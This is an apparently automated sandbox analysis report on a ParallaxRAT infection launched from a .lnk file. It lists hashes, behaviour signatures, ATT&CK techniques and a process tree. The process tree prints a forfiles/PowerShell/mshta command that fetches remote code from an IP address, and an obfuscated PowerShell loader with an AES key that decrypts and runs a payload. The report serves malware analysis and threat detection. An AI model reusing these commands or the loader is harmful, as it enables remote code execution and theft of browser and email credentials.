parallax | 5a39aad1904070d45d1b6d13b792742675de4ddadcc0ca07cc9958b949b5bde1

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
05/06/2024, 17:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ope.lnk
Size

1KB
MD5

01592e5afe616e5f7c25b99ada26c3d6
SHA1

001fdc71455bf6501f4ce6c6fe87c242ab62ba64
SHA256

5a39aad1904070d45d1b6d13b792742675de4ddadcc0ca07cc9958b949b5bde1
SHA512

1d1a058b6729c466aba28f300a775b232cff83465b8a1577ff8104bf6de690cc886e9cdb4d498553165d47812712a3e80a246faf95508c0d022cdf4e8678ee09

Score

10^/10

parallax collection rat spyware stealer

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://64.7.199.224/real

Signatures

ParallaxRat
ParallaxRat is a multipurpose RAT written in MASM.
rat parallax

ParallaxRat payload 2 IoCs

Detects payload of Parallax Rat, a small portable Rat usually digitally signed with a Sectigo certificate.

resource	yara_rule
behavioral1/memory/4508-37-0x0000000000400000-0x0000000000649000-memory.dmp	parallax_rat
behavioral1/memory/4508-39-0x0000000000400000-0x0000000000649000-memory.dmp	parallax_rat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1592	mshta.exe
12	1608	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	mshta.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nestopia.exe	DllHost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nestopia.exe	DllHost.exe

Executes dropped EXE 1 IoCs

pid	Process
4508	nsje.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 2 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	nsje.exe
Key opened	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	nsje.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 44 IoCs

pid	Process
1932	powershell.exe
1932	powershell.exe
1608	powershell.exe
1608	powershell.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe
4508	nsje.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeIncreaseQuotaPrivilege	1608	powershell.exe
Token: SeSecurityPrivilege	1608	powershell.exe
Token: SeTakeOwnershipPrivilege	1608	powershell.exe
Token: SeLoadDriverPrivilege	1608	powershell.exe
Token: SeSystemProfilePrivilege	1608	powershell.exe
Token: SeSystemtimePrivilege	1608	powershell.exe
Token: SeProfSingleProcessPrivilege	1608	powershell.exe
Token: SeIncBasePriorityPrivilege	1608	powershell.exe
Token: SeCreatePagefilePrivilege	1608	powershell.exe
Token: SeBackupPrivilege	1608	powershell.exe
Token: SeRestorePrivilege	1608	powershell.exe
Token: SeShutdownPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeSystemEnvironmentPrivilege	1608	powershell.exe
Token: SeRemoteShutdownPrivilege	1608	powershell.exe
Token: SeUndockPrivilege	1608	powershell.exe
Token: SeManageVolumePrivilege	1608	powershell.exe
Token: 33	1608	powershell.exe
Token: 34	1608	powershell.exe
Token: 35	1608	powershell.exe
Token: 36	1608	powershell.exe
Token: SeIncreaseQuotaPrivilege	1608	powershell.exe
Token: SeSecurityPrivilege	1608	powershell.exe
Token: SeTakeOwnershipPrivilege	1608	powershell.exe
Token: SeLoadDriverPrivilege	1608	powershell.exe
Token: SeSystemProfilePrivilege	1608	powershell.exe
Token: SeSystemtimePrivilege	1608	powershell.exe
Token: SeProfSingleProcessPrivilege	1608	powershell.exe
Token: SeIncBasePriorityPrivilege	1608	powershell.exe
Token: SeCreatePagefilePrivilege	1608	powershell.exe
Token: SeBackupPrivilege	1608	powershell.exe
Token: SeRestorePrivilege	1608	powershell.exe
Token: SeShutdownPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeSystemEnvironmentPrivilege	1608	powershell.exe
Token: SeRemoteShutdownPrivilege	1608	powershell.exe
Token: SeUndockPrivilege	1608	powershell.exe
Token: SeManageVolumePrivilege	1608	powershell.exe
Token: 33	1608	powershell.exe
Token: 34	1608	powershell.exe
Token: 35	1608	powershell.exe
Token: 36	1608	powershell.exe
Token: SeIncreaseQuotaPrivilege	1608	powershell.exe
Token: SeSecurityPrivilege	1608	powershell.exe
Token: SeTakeOwnershipPrivilege	1608	powershell.exe
Token: SeLoadDriverPrivilege	1608	powershell.exe
Token: SeSystemProfilePrivilege	1608	powershell.exe
Token: SeSystemtimePrivilege	1608	powershell.exe
Token: SeProfSingleProcessPrivilege	1608	powershell.exe
Token: SeIncBasePriorityPrivilege	1608	powershell.exe
Token: SeCreatePagefilePrivilege	1608	powershell.exe
Token: SeBackupPrivilege	1608	powershell.exe
Token: SeRestorePrivilege	1608	powershell.exe
Token: SeShutdownPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeSystemEnvironmentPrivilege	1608	powershell.exe
Token: SeRemoteShutdownPrivilege	1608	powershell.exe
Token: SeUndockPrivilege	1608	powershell.exe
Token: SeManageVolumePrivilege	1608	powershell.exe
Token: 33	1608	powershell.exe
Token: 34	1608	powershell.exe
Token: 35	1608	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3972 wrote to memory of 1076	3972	cmd.exe	84
PID 3972 wrote to memory of 1076	3972	cmd.exe	84
PID 1076 wrote to memory of 1932	1076	forfiles.exe	85
PID 1076 wrote to memory of 1932	1076	forfiles.exe	85
PID 1932 wrote to memory of 1592	1932	powershell.exe	86
PID 1932 wrote to memory of 1592	1932	powershell.exe	86
PID 1592 wrote to memory of 1608	1592	mshta.exe	88
PID 1592 wrote to memory of 1608	1592	mshta.exe	88

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	nsje.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\ope.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3972
- C:\Windows\System32\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p C:\Windows /m win.ini /c "powershell . mshta http://64.7.199.224/real"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    . mshta http://64.7.199.224/real
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1932
  - - C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" http://64.7.199.224/real
      4⤵
      Blocklisted process makes network request
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:1592
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EYKhnqJa($IbrmGSK){return -split ($IbrmGSK -replace '..', '0x$& ')};$ZzfnBmIT = EYKhnqJa('25327EABB5B45E191CC70B8F9D8770BB6BACD84F2CA712BC50084950D647B38249DB23DB7EA36CFDC8A5EC46CFF148D94F51E15F40CF8CD547632DE376FA068DE96C791F950BD8B1F2DB825C0F277831DD154F8E7B031B8C4F13A212AB335D663C7CE15E99E7E406B42825CACBC31BE24DFFA1A9FA7FA98BDCA5B4FB293C9E00B9675790FAF89564BFFA159A689165A5AF3238AF76AF6524D3B95ABDED6E512AACC4BB918D9AA11D9F33EA24FE5F8E34DDA26B1EA991D139FAC5BC7254094A86D4FD83A4A79A07930DF04D49B64F3BA07F13BB7EF55336FAED171D05A2EBF917C4A439E0D8320A810BF2319E92996194CFAFA3CAC1EBB514AB2A1E6059A82435510E96B722F4388CF7A7EF8F80282707D8840EF7FCBE64AAD181885217E398B8F9EC7B1BAAA47A26421523363CEE0200649745847C582B7657D4DAED2B5C35EE1ABB6FEFBD255F9788604B7B2988672505BECDC23D9F16C206B87905F9F38ECE1D9305E7F80D7716677ED565EBE184B92793473D85DA54503E9BA220B11735986843E6B25C339A23D9C8B517523302812A04C3D1C2CFA6503E6181AA0DAAD7F71016ED0276ACC62C6F35DF96DA9035A742F4EE5D5A169B7281EB1730ECD0B71C0A562AB96C5BA6159019C400DE154F03B3F8D449270368789756466A8AD1F6C2070E4E0121D372E06344FF42A3A140AF53B86D5C78B6D86CACA6E4B232CC66ADAEEF3D2D8E5524B21A5117616D15DC053DCE4FB922CB2D0406E16D61D0A5F622A0F0F011D6B6F28FDED9B44C6367E93EF82E86AA98736A4FF943BF49FA97897FC697515E0D88831A8366B5BD656E992D0A7CDF2A94E6CA2F3E96E4E7784CD6BE684F741EDBFB0D74A3CD3655C9B88121FACD82B7E9C192347863A2460996893960B6361D20E4E14EABA4CC1B8EA3F1F566B14635086BA34613DECFA6BC281C00267E4092DA9AB4E10DFF9F40C48735C5B1C1454F45564FD00308219639CAEBCB3608570DB81F510314D8180D03F835B49149F945AC00A8BC09D5F4C149A1F726B70E40713EEF16D30FD308BD782D5D59ED60F53DC53736224CB5A344EF74C2E8F2674CA1396A407C3CCA01B583253E711192B8DBD622668C937A96E5651F1306A91A2376D3D77563CD8483127AA00C70CB736DEC7B2ED2F06A18FB87DAB65E3233580382ADEB3DAE0A5A355A740950257790F84B58C0D49EA391AC98B470C137EF4C63C137D55C6D4C33B5F3952501FFACCBAB0F9FCFA641A32BB26472D227CE447A64F33A8C1C4626D603224EA47E8E4179FA84680CCB2C42F67819AF5B21088D0237A37D501A3769B0E2C89DC70FF6777353D05C94A73A4F07F23CBE6326832F494122623E91B06A9FB9A8C7F5C2DB90A19A739463216F06784E50C15B51AC428AC090A18E5B4EADC633E10E9920A237B5F807B6E277A0E4C797B174DC5EDAA77A3F2FCB47510B89BD3CB3BA6B8A5259550540039E5AF4E731A6AD997C4F88C8F493EF009309A29F21A2765DCA1E559D07992401658AFB182F1F210A49562F3CF856850A60690016F539C0D68850D8B2B34069266228D54926CB6D27DFBD76');$JcckQ = [System.Security.Cryptography.Aes]::Create();$JcckQ.Key = EYKhnqJa('776446676A4C64474A6C67476C7A424C');$JcckQ.IV = New-Object byte[] 16;$lFwklJfh = $JcckQ.CreateDecryptor();$zLemdkrqZ = $lFwklJfh.TransformFinalBlock($ZzfnBmIT, 0, $ZzfnBmIT.Length);$BDcDxelDf = [System.Text.Encoding]::Utf8.GetString($zLemdkrqZ);$lFwklJfh.Dispose();& $BDcDxelDf.Substring(0,3) $BDcDxelDf.Substring(3)
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1608

C:\Users\Admin\AppData\Local\Temp\nsje.exe
C:\Users\Admin\AppData\Local\Temp\nsje.exe
1⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
PID:4508

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}
1⤵
- Drops startup file
PID:560

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a11402783a8686e08f8fa987dd07bca

SHA1
580df3865059f4e2d8be10644590317336d146ce

SHA256
9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

SHA512
5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uy3qzmea.cdk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsje.exe

Filesize
2.2MB

MD5
ff20e30e6d29befd48e33d001c3966d2

SHA1
36008e5293e23fc5ee512f0a6b56baf54fc42d25

SHA256
8cac09a39c2122301e34bd9374ee592a6bc6ee5730223d9934a28447bfdbb767

SHA512
6bbea472b7f4a8a8d697dd315fb40efc69a35f85f7818c0b77e3e89d1266d986e4b4aa1e4d729613c297ae6fc00e4a71b8230e74d7811840acfa1d2f40633b23

Download Submit
memory/1932-11-0x00007FF8D81B0000-0x00007FF8D8C71000-memory.dmp

Filesize
10.8MB

Download
memory/1932-15-0x00007FF8D81B0000-0x00007FF8D8C71000-memory.dmp

Filesize
10.8MB

Download
memory/1932-16-0x00007FF8D81B0000-0x00007FF8D8C71000-memory.dmp

Filesize
10.8MB

Download
memory/1932-12-0x00007FF8D81B0000-0x00007FF8D8C71000-memory.dmp

Filesize
10.8MB

Download
memory/1932-0-0x00007FF8D81B3000-0x00007FF8D81B5000-memory.dmp

Filesize
8KB

Download
memory/1932-1-0x000001F0D4060000-0x000001F0D4082000-memory.dmp

Filesize
136KB

Download
memory/4508-37-0x0000000000400000-0x0000000000649000-memory.dmp

Filesize
2.3MB

Download
memory/4508-38-0x0000000002810000-0x0000000002900000-memory.dmp

Filesize
960KB

Download
memory/4508-39-0x0000000000400000-0x0000000000649000-memory.dmp

Filesize
2.3MB

Download